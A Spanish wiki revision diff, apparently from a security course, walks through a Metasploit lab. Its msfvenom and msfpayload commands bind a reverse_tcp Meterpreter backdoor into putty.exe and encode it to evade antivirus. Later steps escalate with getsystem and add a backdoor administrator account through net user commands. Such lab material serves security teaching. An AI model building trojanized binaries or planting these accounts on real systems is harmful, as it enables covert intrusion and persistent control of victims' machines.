Herramientas de usuario

Herramientas del sitio


sad:t2:m3

Diferencias

Muestra las diferencias entre dos versiones de la página.

Enlace a la vista de comparación

Ambos lados, revisión anterior Revisión previa
Próxima revisión
Revisión previa
sad:t2:m3 [2018/12/01 16:54]
José Manuel Guallar
sad:t2:m3 [2019/12/04 18:45] (actual)
José Manuel Guallar
Línea 8: Línea 8:
 Metasploit Framework es una herramienta de penetración de código abierto que se utiliza para desarrollar y ejecutar código de exploits en una máquina de destino remota. En definitiva, Metasploit se puede usar para probar la vulnerabilidad de los sistemas informáticos con el fin de protegerlos y, por otro lado, también se puede usar para penetrar en sistemas remotos. Metasploit Framework es una herramienta de penetración de código abierto que se utiliza para desarrollar y ejecutar código de exploits en una máquina de destino remota. En definitiva, Metasploit se puede usar para probar la vulnerabilidad de los sistemas informáticos con el fin de protegerlos y, por otro lado, también se puede usar para penetrar en sistemas remotos.
  
-** ¿Qué es mfspayload?**+** ¿Qué es msfvenom?**
  
-msfpayload es una instancia de línea de comandos de Metasploit que se utiliza para generar y generar todos los diversos tipos de código de shell que están disponibles en Metasploit. El uso más común de esta herramienta es para la generación de código de shell para una vulnerabilidad que no se encuentra actualmente en el Marco de Metasploit o para probar diferentes tipos de código de shell y opciones antes de finalizar un Módulo de explotación. +Es una instancia de línea de comandos de Metasploit que se utiliza para generar y generar todos los diversos tipos de código de shell que están disponibles en Metasploit. El uso más común de esta herramienta es para la generación de código de shell para una vulnerabilidad que no se encuentra actualmente en el Marco de Metasploit o para probar diferentes tipos de código de shell y opciones antes de finalizar un Módulo de explotación. ​Tambien ​modifica el codigo cualquier programa.
- +
-** ¿Qué es msfencode?​** +
- +
-msfencode es otra gran herramienta que el que modifica el codigo cualquier programa.+
  
  
Línea 60: Línea 56:
 <​code>​ <​code>​
 cp putty.exe /​usr/​share/​metasploit-framework/​data/​templates/​ cp putty.exe /​usr/​share/​metasploit-framework/​data/​templates/​
-msfpayload ​windows/​meterpreter/​reverse_tcp LHOST=<​ip_del_kali>​ LPORT=4444 ​R | msfencode -t exe -x putty.exe -k -o bad_putty.exe -e x86/​shikata_ga_nai -3+msfvenom -p windows/​meterpreter/​reverse_tcp LHOST=<​ip_del_kali>​ LPORT=4444 -x putty.exe -e x86/​shikata_ga_nai --k -f exe > bad_putty.exe
 chmod 744 /​var/​www/​bad_putty.exe chmod 744 /​var/​www/​bad_putty.exe
 ls -lrta | grep putty ls -lrta | grep putty
Línea 67: Línea 63:
 El comando 1, ejecutables,​ como putty.exe, debe copiarse en el directorio /templates/ para codificarlo con msfencode. El comando 1, ejecutables,​ como putty.exe, debe copiarse en el directorio /templates/ para codificarlo con msfencode.
  
-El comando 2, crea una puerta trasera reverse_tcp usando ​msfpayload ​para conectarse nuevamente a Kali (LHOST = ip_kali) por el puerto (LPORT = 4444). Se usa msfencode ​para enlazar la puerta trasera en putty.exe. Se utilizan ​ce 3 interacciones de codificación shikata_ga_nai (No hay mas remedio) para  evitar el antivirus de la máquina.+El comando 2, crea una puerta trasera reverse_tcp usando ​msfvenom ​para conectarse nuevamente a Kali (LHOST = ip_kali) por el puerto (LPORT = 4444). Se usa para enlazar la puerta trasera en putty.exe. Se utilizan 3 interacciones de codificación shikata_ga_nai (No hay mas remedio) para  evitar el antivirus de la máquina.
  
 Comando 3, hace ejecutable bad_putty. Comando 3, hace ejecutable bad_putty.
     ​     ​
  
-{{:​sad:​t2:​m3:​04.png?600|}} +{{:​sad:​t2:​m3:​4_1.png?600|}}
 <​code>​ <​code>​
 script msfconsole_putty.txt script msfconsole_putty.txt
Línea 175: Línea 170:
  
 {{:​sad:​t2:​m3:​19.png?​600|}} {{:​sad:​t2:​m3:​19.png?​600|}}
 +
 +
 +
 {{:​sad:​t2:​m3:​20.png?​600|}} {{:​sad:​t2:​m3:​20.png?​600|}}
 +
 +<​code>​
 +getuid
 +getsystem
 +getuid
 +</​code>​
 +
 +comando 1 proporciona el nombre de usuario "​estudiante"​
 +
 +comando 2 permite poner la cuenta de usuario como cuenta de administrador
 +
 +comando 3 el usuario ya es administrador privilegiado
 +
 {{:​sad:​t2:​m3:​21.png?​600|}} {{:​sad:​t2:​m3:​21.png?​600|}}
 +
 +<​code>​
 +shell
 +net users nombre_hacker abc123 /ADD /​FULLNAME:"​YOUR NAME"
 +reemplaza nombre_hacker por tu nombre
 +net localgroup Administrators nombre_hacker /ADD
 +net localgroup Administrators
 +</​code>​
 +
 +Se crea nombre_hacker con su contraseña
 +Muestra que usuarios pertenecen al grupo de Administradores. hombre_hacker pertenece ahora al grupo
 +
 {{:​sad:​t2:​m3:​22.png?​600|}} {{:​sad:​t2:​m3:​22.png?​600|}}
 +
 +Se sale del Meterpreter al sistema
 +
 {{:​sad:​t2:​m3:​23.png?​600|}} {{:​sad:​t2:​m3:​23.png?​600|}}
 +<​code>​
 +net users nombre_hacker
 +</​code>​
 +
 +Muestra los detalles de nombre_hacker
 {{:​sad:​t2:​m3:​24.png?​600|}} {{:​sad:​t2:​m3:​24.png?​600|}}
 {{:​sad:​t2:​m3:​25.png?​600|}} {{:​sad:​t2:​m3:​25.png?​600|}}
 +
 +Establecemos una sesión remota con el Windows 7
 +
 {{:​sad:​t2:​m3:​26.png?​600|}} {{:​sad:​t2:​m3:​26.png?​600|}}
 <​code>​ <​code>​
sad/t2/m3.1543683264.txt.gz · Última modificación: 2019/01/04 13:18 (editor externo)